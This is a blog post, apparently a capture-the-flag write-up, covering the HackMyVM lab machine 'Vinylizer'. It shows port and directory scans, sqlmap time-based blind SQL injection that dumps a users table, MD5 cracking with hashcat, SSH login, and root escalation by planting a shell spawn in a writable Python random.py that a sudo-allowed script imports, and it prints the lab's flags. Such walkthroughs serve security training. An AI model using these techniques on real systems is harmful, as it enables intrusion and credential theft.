{"id":469,"date":"2024-03-27T18:38:59","date_gmt":"2024-03-27T10:38:59","guid":{"rendered":"http:\/\/162.14.82.114\/?p=469"},"modified":"2024-03-27T18:38:59","modified_gmt":"2024-03-27T10:38:59","slug":"hmv-_-vinylizer","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/469\/03\/27\/2024\/","title":{"rendered":"hmv[-_-]Vinylizer"},"content":{"rendered":"<h1>Vinylizer<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837208.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837208.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240327151300331\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837209.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837209.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240327151337903\" style=\"zoom: 50%;\" 
\/><\/div><\/p>\n<p>Start the attack.<\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">nmap -sCV -p- 10.0.2.12<\/code><\/pre>\n<pre><code class=\"language-text\">PORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 f8:e3:79:35:12:8b:e7:41:d4:27:9d:97:a5:14:b6:16 (ECDSA)\n|_  256 e3:8b:15:12:6b:ff:97:57:82:e5:20:58:2d:cb:55:33 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\n|_http-title: Vinyl Records Marketplace\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code>gobuster dir -u http:\/\/10.0.2.12\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html.png,jpg,zip<\/code><\/pre>\n<pre><code>\/.php                 (Status: 403) [Size: 274]\n\/img                  (Status: 301) [Size: 304] [--&gt; http:\/\/10.0.2.12\/img\/]\n\/.html.png            (Status: 403) [Size: 274]\n\/login.php            (Status: 200) [Size: 1408]\n\/.html.png            (Status: 403) [Size: 274]\n\/.php                 (Status: 403) [Size: 274]\n\/server-status        (Status: 403) [Size: 274]\nProgress: 1323360 \/ 1323366 (100.00%)<\/code><\/pre>\n<h3>Vulnerability Scan<\/h3>\n<pre><code class=\"language-bash\">sudo nikto -h http:\/\/10.0.2.12<\/code><\/pre>\n<pre><code class=\"language-bash\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          10.0.2.12\n+ Target Hostname:    10.0.2.12\n+ Target Port:        80\n+ Start Time:         2024-03-27 03:19:57 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.52 (Ubuntu)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. 
See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ \/: Server may leak inodes via ETags, header found with file \/, inode: 916, size: 60f60f431ef12, mtime: gzip. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2003-1418\n+ Apache\/2.4.52 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .\n+ \/login.php: Cookie PHPSESSID created without the httponly flag. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Cookies\n+ \/img\/: Directory indexing found.\n+ \/img\/: This might be interesting.\n+ \/login.php: Admin login page\/section found.\n+ 8102 requests: 0 error(s) and 9 item(s) reported on remote host\n+ End Time:           2024-03-27 03:20:10 (GMT-4) (13 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h3>Wappalyzer<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837211.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837211.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240327152301015\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Visiting Sensitive Directories<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837212.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837212.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240327152337003\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>Tried weak passwords and a universal password (SQL injection login bypass). Neither worked, but the page returns an error message saying the user does not exist:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837213.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837213.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240327152549407\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>Capture the request and take a look:<\/p>\n<pre><code class=\"language-text\">POST \/login.php HTTP\/1.1\nHost: 10.0.2.12\nContent-Length: 39\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/10.0.2.12\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/121.0.6167.85 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7\nReferer: http:\/\/10.0.2.12\/login.php\nAccept-Encoding: gzip, deflate, br\nAccept-Language: en-US,en;q=0.9\nCookie: PHPSESSID=s499nedv7djhha1tnjjs1onjlj\nConnection: close\n\nusername=admin&amp;password=password&amp;login=<\/code><\/pre>\n<p>Run <code>sqlmap<\/code> against it:<\/p>\n<pre><code class=\"language-bash\">sqlmap -r sql.txt -p username --dbs<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837214.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837214.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240327154619801\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>It is a time-based blind injection...<\/p>\n<p>Found three databases.<\/p>\n<p>Try to get the tables:<\/p>\n<pre><code class=\"language-bash\">sqlmap -l sql.txt --batch -D vinyl_marketplace --tables<\/code><\/pre>\n<pre><code class=\"language-apl\">Database: vinyl_marketplace\n[1 table]\n+-------+\n| users |\n+-------+<\/code><\/pre>\n<p>View the columns:<\/p>\n<pre><code class=\"language-bash\">sqlmap -l sql.txt --batch -D vinyl_marketplace -T users --columns<\/code><\/pre>\n<pre><code class=\"language-apl\">[4 columns]\n+----------------+--------------+\n| Column         | Type         |\n+----------------+--------------+\n| id             | int          |\n| login_attempts | int          |\n| password       | varchar(255) |\n| username       | varchar(255) |\n+----------------+--------------+<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap -l sql.txt --batch -D vinyl_marketplace -T users --dump<\/code><\/pre>\n<pre><code class=\"language-apl\">Table: users\n[2 entries]\n+----+----------------------------------+-----------+----------------+\n| id | password                         | username  | login_attempts |\n+----+----------------------------------+-----------+----------------+\n| 1  | 9432522ed1a8fca612b11c3980a031f6 | shopadmin | 0              |\n| 2  | password123                      | lana      | 0              |\n+----+----------------------------------+-----------+----------------+<\/code><\/pre>\n<p>Crack the hash:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837215.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837215.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240327180712065\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Got the password:<\/p>\n<pre><code class=\"language-apl\">shopadmin       addicted2vinyl<\/code><\/pre>\n<p>Tried logging in, but the page shows <code>Invalid password<\/code>.<\/p>\n<p>Try logging in over SSH!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837216.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837216.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240327181040204\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>Success!<\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-python\">shopadmin@vinylizer:~$ ip a\n1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft 
forever\n    inet6 ::1\/128 scope host \n       valid_lft forever preferred_lft forever\n2: enp0s3: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc fq_codel state UP group default qlen 1000\n    link\/ether 08:00:27:6d:ec:17 brd ff:ff:ff:ff:ff:ff\n    inet 10.0.2.12\/24 metric 100 brd 10.0.2.255 scope global dynamic enp0s3\n       valid_lft 305sec preferred_lft 305sec\n    inet6 fe80::a00:27ff:fe6d:ec17\/64 scope link \n       valid_lft forever preferred_lft forever\nshopadmin@vinylizer:~$ sudo -l\nMatching Defaults entries for shopadmin on vinylizer:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin,\n    use_pty\n\nUser shopadmin may run the following commands on vinylizer:\n    (ALL : ALL) NOPASSWD: \/usr\/bin\/python3 \/opt\/vinylizer.py\nshopadmin@vinylizer:~$ cat \/opt\/vinylizer.py\n# @Name: Vinylizer\n# @Author: MrMidnight\n# @Version: 1.8\n\nimport json\nimport random\n\ndef load_albums(filename):\n    try:\n        with open(filename, &#039;r&#039;) as file:\n            content = file.read()\n            if not content:\n                return []\n            albums = json.loads(content)\n    except FileNotFoundError:\n        albums = []\n    except json.JSONDecodeError:\n        print(f&quot;Error decoding JSON_Config: {filename}.&quot;)\n        albums = []\n    return albums\n\ndef save_albums(filename, albums):\n    with open(filename, &#039;w&#039;) as file:\n        json.dump(albums, file, indent=None)\n\ndef print_albums(albums):\n    if not albums:\n        print(&quot;No albums available.&quot;)\n    else:\n        print(&quot;Available Albums:&quot;)\n        for album in albums:\n            print(f&quot;- {album[&#039;name&#039;]}, Sides: {&#039;, &#039;.join(album[&#039;sides&#039;])}&quot;)\n\ndef randomize_sides(album):\n    sides = list(album[&#039;sides&#039;])\n    random.shuffle(sides)\n    return {&quot;name&quot;: album[&#039;name&#039;], 
&quot;sides&quot;: sides}\n\ndef randomize_vinyl(albums):\n    if not albums:\n        print(&quot;No albums available. Add one with &#039;A&#039;.&quot;)\n        return None, None\n\n    random_album = random.choice(albums)\n    random_side = random.choice(random_album[&#039;sides&#039;])\n\n    return random_album[&#039;name&#039;], random_side\n\ndef add_vinyl(albums, filename, name, num_sides):\n    # Generate sides from A to the specified number\n    sides = [chr(ord(&#039;A&#039;) + i) for i in range(num_sides)]\n\n    # Add new vinyl\n    new_album = {&quot;name&quot;: name, &quot;sides&quot;: sides}\n    albums.append(new_album)\n    save_albums(filename, albums)\n    print(f&quot;Album &#039;{name}&#039; with {num_sides} sides added successfully.\\n&quot;)\n\ndef delete_vinyl(albums, filename, name):\n    for album in albums:\n        if album[&#039;name&#039;] == name:\n            albums.remove(album)\n            save_albums(filename, albums)\n            print(f&quot;Album &#039;{name}&#039; deleted successfully!\\n&quot;)\n            return\n    print(f&quot;Album &#039;{name}&#039; not found.&quot;)\n\ndef list_all(albums):\n    print_albums(albums)\n\nif __name__ == &quot;__main__&quot;:\n\n    # Banner. Dont touch!\n    print(&quot;o      &#039;O                  o\\nO       o o               O  o\\no       O                 o\\no       o                 O\\nO      O&#039; O  &#039;OoOo. O   o o  O  ooOO .oOo. `OoOo.\\n`o    o   o   o   O o   O O  o    o  OooO&#039;  o\\n `o  O    O   O   o O   o o  O   O   O      O\\n  `o&#039;     o&#039;  o   O `OoOO Oo o&#039; OooO `OoO&#039;  o\\nBy: MrMidnight          o\\n                     OoO&#039;                         \\n&quot;)\n\n    config_file = &quot;config.json&quot;\n\n    albums_config = load_albums(config_file)\n\n    while True:\n        choice = input(&quot;Do you want to (R)andomly choose a Album, (A)dd a new one, (D)elete an album, (L)ist all albums, or (Q)uit? 
: &quot;).upper()\n\n        if choice == &quot;R&quot;:\n            random_album, random_side = randomize_vinyl(albums_config)\n            if random_album is not None and random_side is not None:\n                print(f&quot;Randomly selected album: {random_album}, Random side: {random_side}\\n&quot;)\n\n        elif choice == &quot;A&quot;:\n            name = input(&quot;\\nEnter the name of the new album: &quot;)\n\n            while True:\n                try:\n                    num_sides = int(input(&quot;Enter the number of sides for the new album: &quot;))\n                    break  # Break the loop if the input is a integer\n                except ValueError:\n                    print(&quot;\\nInvalid input. Please enter a valid integer for the number of sides.&quot;)\n\n            add_vinyl(albums_config, config_file, name, num_sides)\n\n        elif choice == &quot;D&quot;:\n            name = input(&quot;\\nEnter the name of the album to delete: &quot;)\n            delete_vinyl(albums_config, config_file, name)\n\n        elif choice == &quot;L&quot;:\n            list_all(albums_config)\n            print(&quot;&quot;)\n\n        elif choice == &quot;Q&quot;:\n            print(&quot;\\nQuitting Vinylizer.&quot;)\n            break\n\n        else:\n            print(&quot;Invalid Input!&quot;)<\/code><\/pre>\n<p>Let an AI read it:<\/p>\n<blockquote>\n<p>This code is a simple Python program for managing a list of records (or similar items). Let us go through what it does, section by section:<\/p>\n<\/blockquote>\n<ol>\n<li><code>load_albums(filename)<\/code>: This function loads the album list from a file. It tries to open the file, read its contents, and parse them as 
JSON. If the file does not exist or parsing fails, it returns an empty list.<\/li>\n<li><code>save_albums(filename, albums)<\/code>: This function takes a filename and an album list and saves the album list to the file in JSON format.<\/li>\n<li><code>print_albums(albums)<\/code>: This function prints all albums along with the sides each one contains.<\/li>\n<li><code>randomize_sides(album)<\/code>: This function randomly shuffles the sides of an album.<\/li>\n<li><code>randomize_vinyl(albums)<\/code>: This function picks a random album from the given album list and then picks one of its sides at random.<\/li>\n<li><code>add_vinyl(albums, filename, name, num_sides)<\/code>: This function adds a new album to the album list. It takes the album list, the filename, the album name and the number of sides as parameters, appends the new album to the list, and then saves it to the file.<\/li>\n<li><code>delete_vinyl(albums, filename, name)<\/code>: This function deletes the specified album from the album list. It takes the album list, the filename and the album name as parameters, finds and removes the matching album from the list, and then saves it to the file.<\/li>\n<li><code>list_all(albums)<\/code>: 
This function lists all albums along with the sides each one contains.<\/li>\n<\/ol>\n<p>There does not seem to be anything exploitable here, and it does not load any system functions. Continue gathering information:<\/p>\n<pre><code class=\"language-bash\">shopadmin@vinylizer:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/snap\/core20\/1974\/usr\/bin\/chfn\n\/snap\/core20\/1974\/usr\/bin\/chsh\n\/snap\/core20\/1974\/usr\/bin\/gpasswd\n\/snap\/core20\/1974\/usr\/bin\/mount\n\/snap\/core20\/1974\/usr\/bin\/newgrp\n\/snap\/core20\/1974\/usr\/bin\/passwd\n\/snap\/core20\/1974\/usr\/bin\/su\n\/snap\/core20\/1974\/usr\/bin\/sudo\n\/snap\/core20\/1974\/usr\/bin\/umount\n\/snap\/core20\/1974\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1974\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/snapd\/19457\/usr\/lib\/snapd\/snap-confine\n\/usr\/bin\/pkexec\n\/usr\/bin\/su\n\/usr\/bin\/sudo\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chsh\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/fusermount3\n\/usr\/bin\/umount\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/libexec\/polkit-agent-helper-1\n\nshopadmin@vinylizer:~$ find \/ -type f -writable 
2&gt;\/dev\/null\n............\n\/proc\/2193\/projid_map\n\/proc\/2193\/setgroups\n\/proc\/2193\/timerslack_ns\n\/run\/user\/1001\/systemd\/generator.late\/app-snap\\x2duserd\\x2dautostart@autostart.service\n\/run\/user\/1001\/systemd\/generator.late\/app-polkit\\x2dgnome\\x2dauthentication\\x2dagent\\x2d1@autostart.service\n\/home\/shopadmin\/.bash_history\n\/home\/shopadmin\/.bashrc\n\/home\/shopadmin\/.profile\n\/home\/shopadmin\/.bash_logout\n\/home\/shopadmin\/.viminfo\n\/home\/shopadmin\/.cache\/motd.legal-displayed\n\/home\/shopadmin\/user.txt\n\/usr\/lib\/python3.10\/random.py<\/code><\/pre>\n<p>It looks like the author has left us a hint: we can modify <code>random.py<\/code> so that sudo runs the function we want!<\/p>\n<pre><code class=\"language-bash\">shopadmin@vinylizer:~$ head \/usr\/lib\/python3.10\/random.py\nimport pty\npty.spawn(&quot;\/bin\/bash&quot;)\n&quot;&quot;&quot;Random variable generators.\n\n    bytes\n    -----\n           uniform bytes (values between 0 and 255)\n\n    integers\n    --------\nshopadmin@vinylizer:~$ sudo python3 \/opt\/vinylizer.py\nroot@vinylizer:\/home\/shopadmin# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@vinylizer:\/home\/shopadmin# cd \/root;ls\nroot.txt  snap\nroot@vinylizer:~# cat root.txt\n4UD10PH1L3\nroot@vinylizer:~# cd \/home\nroot@vinylizer:\/home# ls\nmrmidnight  shopadmin\nroot@vinylizer:\/home# cd shopadmin\/\nroot@vinylizer:\/home\/shopadmin# ls\nuser.txt\nroot@vinylizer:\/home\/shopadmin# cat user.txt \nI_L0V3_V1NYL5<\/code><\/pre>\n<h2>Extra Takeaways<\/h2>\n<p>While reading other players' writeups I found a few things worth learning!<\/p>\n<h3>SQL injection with ghauri<\/h3>\n<pre><code class=\"language-bash\">git clone https:\/\/github.com\/r0oth3x49\/ghauri.git\ncd ghauri\npip install -r requirements.txt\nsudo python3 
setup.py install<\/code><\/pre>\n<pre><code class=\"language-bash\">ghauri -r sql.txt -p username --dbs\nghauri -r sql.txt -p username --dbms mysql -D vinyl_marketplace --tables\nghauri -r sql.txt -p username --dbms mysql -D vinyl_marketplace -T users --dump<\/code><\/pre>\n<p>In testing it was very fast!<\/p>\n<h3>Cracking with hashcat<\/h3>\n<pre><code class=\"language-bash\">hashcat -a 0 -m 0 &quot;9432522ed1a8fca612b11c3980a031f6&quot; \/usr\/share\/wordlists\/rockyou.txt --show<\/code><\/pre>\n<ul>\n<li><code>-a 0<\/code> selects dictionary attack mode, that is, the hash is compared against every word in a wordlist.<\/li>\n<li><code>-m 0<\/code> specifies the type of hash algorithm to crack. Here, <code>0<\/code> stands for the MD5 hash algorithm.<\/li>\n<li><code>&quot;9432522ed1a8fca612b11c3980a031f6&quot;<\/code> is the hash to crack.<\/li>\n<li><code>\/usr\/share\/wordlists\/rockyou.txt<\/code> is the path to the password list. In this command, Hashcat tries the passwords in the RockYou wordlist against the hash.<\/li>\n<li><code>--show<\/code> means that if a matching password is found, the password itself is displayed rather than the hash.<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Vinylizer Start the attack. Information Gathering Port Scan nmap -sCV -p- 10.0.2.12 POR 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-469","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/469","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=469"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/469\/revisions"}],"predecessor-version":[{"id":470,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/469\/revisions\/470"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=469"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=469"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=469"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}